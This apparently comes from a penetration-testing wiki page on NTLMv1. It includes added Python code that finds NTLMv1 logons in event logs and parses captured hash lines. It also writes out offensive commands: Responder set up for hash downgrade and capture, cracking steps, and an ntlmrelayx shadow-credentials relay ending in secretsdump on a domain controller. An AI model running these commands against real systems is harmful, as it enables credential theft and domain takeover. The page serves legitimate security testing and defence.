NT LAN Manager version 1 (NTLMv1) is vulnerable to several attacks and should be disabled wherever possible. All Microsoft operating systems support its successor, NT LAN Manager version 2 (NTLMv2), which should be used instead.
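Before NTLMv1 can be disabled, a defender needs to know which hosts still authenticate with it. The following added example (not part of the original page) parses Windows Security event 4624 records exported as `Field: value` text, where the `Package Name (NTLM only)` field records `NTLM V1` versus `NTLM V2`, and reports the NTLMv1 logons per source host. The three sample events and the line-oriented export layout are constructed for this example; a real export from Event Viewer or a SIEM will need its own field mapping.

```python
"""Find NTLMv1 logons in exported Windows Security event 4624 text.

Assumes each event is a blank-line-separated block of 'Field: value' lines
(a constructed export layout, not the native EVTX/XML format)."""
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample of three 4624 message bodies; not real log data.
SAMPLE_EVENTS = """\
Event ID: 4624
Account Name: svc_backup
Account Domain: CONTOSO
Workstation Name: FILE01
Source Network Address: 10.0.0.25
Logon Process: NtLmSsp
Authentication Package: NTLM
Package Name (NTLM only): NTLM V1
Key Length: 56

Event ID: 4624
Account Name: jdoe
Account Domain: CONTOSO
Workstation Name: WS042
Source Network Address: 10.0.0.77
Logon Process: NtLmSsp
Authentication Package: NTLM
Package Name (NTLM only): NTLM V2
Key Length: 128

Event ID: 4624
Account Name: jdoe
Account Domain: CONTOSO
Workstation Name: WS042
Source Network Address: 10.0.0.77
Logon Process: Kerberos
Authentication Package: Kerberos
Package Name (NTLM only): -
Key Length: 0
"""

# 'Field name: value' -> (field name, value); the field name carries no colon.
FIELD = re.compile(r"^\s*([^:]+?):\s*(.*)$")


def parse_events(text: str) -> List[Dict[str, str]]:
    """Split the export into one dict of fields per event."""
    events: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                events.append(current)
                current = {}
            continue
        match = FIELD.match(line)
        if match:
            current[match.group(1).strip()] = match.group(2).strip()
    if current:
        events.append(current)
    return events


def is_ntlmv1_logon(event: Dict[str, str]) -> bool:
    """True for a successful logon (4624) that negotiated NTLMv1."""
    return (
        event.get("Event ID") == "4624"
        and event.get("Authentication Package", "").upper() == "NTLM"
        and event.get("Package Name (NTLM only)", "").upper() == "NTLM V1"
    )


def ntlmv1_logons(text: str) -> List[Tuple[str, str, str]]:
    """Return (DOMAIN\\account, workstation, source address) for each NTLMv1 logon."""
    return [
        (f'{e.get("Account Domain", "?")}\\{e.get("Account Name", "?")}',
         e.get("Workstation Name", "?"),
         e.get("Source Network Address", "?"))
        for e in parse_events(text)
        if is_ntlmv1_logon(e)
    ]


def ntlmv1_sources(text: str) -> Counter:
    """Count NTLMv1 logons per source address, to prioritise which clients to fix."""
    return Counter(src for _, _, src in ntlmv1_logons(text))


if __name__ == "__main__":
    for account, workstation, source in ntlmv1_logons(SAMPLE_EVENTS):
        print(f"NTLMv1 logon: {account} from {workstation} ({source})")
    print(ntlmv1_sources(SAMPLE_EVENTS))
```

Only the first sample event is reported: the second negotiated NTLMv2 and the third used Kerberos. Once the per-source counts reach zero, the client side of the change is the `LmCompatibilityLevel` setting (the "Network security: LAN Manager authentication level" policy), which controls whether a host still offers NTLMv1.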
An NTLMv1 hash is formatted as follows:

```
username::hostname:response:response:challenge -> NTHASH:response
```
In environments where NTLMv1 is still in use, an NTLMv1 hash can be obtained from a target computer. As partially described in the Coercion section, Responder must be running before the callback arrives, and its `Challenge` variable must first be set to 1122334455667788.
We can then run Responder with one of the following sets of options:

```bash
# Receive and attempt to crack the hash with crack.sh's rainbow tables
Responder.py -I $interface --lm
# Attempt to remove ESS/SSP and crack locally or for a fee
Responder.py -I $interface --lm --disable-ess
```
Referencing crack.sh, an NTLMv1 hash with ESS/SSP looks like the following:

```
hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788
```
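To make the format above concrete, here is an added example (not code from the page, Responder or crack.sh) that parses a captured line into its fields and reports the two properties that decide how it can be handled: whether ESS/SSP was negotiated (the LM response field then holds an 8-byte client challenge followed by 16 zero bytes rather than a real LM response) and whether the server challenge is the static 1122334455667788 value. The first sample is the page's ESS/SSP line rebuilt field by field; the second is a constructed line without ESS/SSP.

```python
"""Parse NTLMv1 lines in the username::hostname:lm_response:nt_response:challenge
format and classify them (ESS/SSP present, static server challenge)."""
import re
from dataclasses import dataclass
from typing import Dict, Optional

# The static challenge Responder is configured with above.
STATIC_CHALLENGE = "1122334455667788"
HEX = re.compile(r"^[0-9A-Fa-f]+$")

# The ESS/SSP example line from the page, rebuilt field by field.
SAMPLE_ESS = (
    "hashcat::DUSTIN-5AA37877:"
    + "85D5BC2CE95161CD" + "0" * 32 + ":"
    + "892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:"
    + "1122334455667788"
)
# Constructed line without ESS/SSP and with a non-static challenge (not a real capture).
SAMPLE_PLAIN = (
    "alice::WS042:"
    + "0123456789ABCDEF" * 3 + ":"
    + "FEDCBA9876543210" * 3 + ":"
    + "0A1B2C3D4E5F6071"
)


@dataclass
class NtlmV1Capture:
    username: str
    hostname: str
    lm_response: str       # 24 bytes, 48 hex characters
    nt_response: str       # 24 bytes, 48 hex characters
    server_challenge: str  # 8 bytes, 16 hex characters

    @property
    def uses_ess(self) -> bool:
        # Under ESS/SSP the LM response field is an 8-byte client challenge
        # padded with 16 zero bytes instead of a real LM response.
        return self.lm_response[16:] == "0" * 32

    @property
    def client_challenge(self) -> Optional[str]:
        return self.lm_response[:16] if self.uses_ess else None

    @property
    def static_challenge(self) -> bool:
        return self.server_challenge == STATIC_CHALLENGE


def parse_ntlmv1(line: str) -> NtlmV1Capture:
    """Split the six colon-separated fields and validate their hex lengths."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected username::hostname:lm_response:nt_response:challenge")
    username, _, hostname, lm_resp, nt_resp, challenge = parts
    for name, value, length in (("LM response", lm_resp, 48),
                                ("NT response", nt_resp, 48),
                                ("server challenge", challenge, 16)):
        if len(value) != length or not HEX.match(value):
            raise ValueError(f"{name} must be {length} hex characters")
    return NtlmV1Capture(username, hostname, lm_resp.upper(),
                         nt_resp.upper(), challenge.upper())


def is_valid_ntlmv1(line: str) -> bool:
    """True when the line parses as a well-formed NTLMv1 capture."""
    try:
        parse_ntlmv1(line)
        return True
    except ValueError:
        return False


def describe(line: str) -> Dict[str, object]:
    """Summarise a capture line as a plain dict."""
    cap = parse_ntlmv1(line)
    return {
        "username": cap.username,
        "hostname": cap.hostname,
        "ess": cap.uses_ess,
        "client_challenge": cap.client_challenge,
        "static_challenge": cap.static_challenge,
    }


if __name__ == "__main__":
    for sample in (SAMPLE_ESS, SAMPLE_PLAIN):
        print(describe(sample))
```

For the page's sample line the parser reports ESS/SSP present with client challenge `85D5BC2CE95161CD` and the static challenge; the constructed line reports neither. A static challenge in captured material is itself a useful indicator that a Responder-style listener, not a legitimate server, answered the client.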
After obtaining a hash with ESS/SSP, it first needs to be reformatted using EvilMog's NTLMv1-multi tool or assless-chaps, and then cracked against a database of NT hashes.
{% hint style="warning" %} If we weren't able to remove the ESS/SSP with Responder, it will no longer be possible to crack the hash with crack.sh's rainbow tables. Instead, it can be submitted and cracked on crack.sh for a fee. {% endhint %}
If NTLMv1 is enabled, you can leverage the fact that domain controllers are able to modify their own msDS-KeyCredentialLink attribute. Note that this requires two domain controllers to exploit.
1. `ntlmrelayx.py -t ldap://$dc1 -of hashes --shadow-credentials --shadow-target '$dc2' --cert-outfile-path crt --no-validate-privs --remove-mic`
2. `gettgtpkinit.py -cert-pfx crt.pfx -pfx-pass PFX_PASSWORD contoso.com/DC2$ crt.ccache`
3. `KRB5CCNAME=crt.ccache getnthash.py contoso.com/DC2\$ -key KEY_FROM_PKINIT`
4. `secretsdump.py 'contoso.com/DC2$'@DC2 -hashes :NTHASH_FROM_GETNTHASH -history`
{% embed url="https://crack.sh/cracking-ntlmv1-w-ess-ssp/" %}
{% embed url="https://www.praetorian.com/blog/ntlmv1-vs-ntlmv2/" %}
{% embed url="https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/" %}
{% embed url="https://twitter.com/godacity_/status/1646282884020580352" %}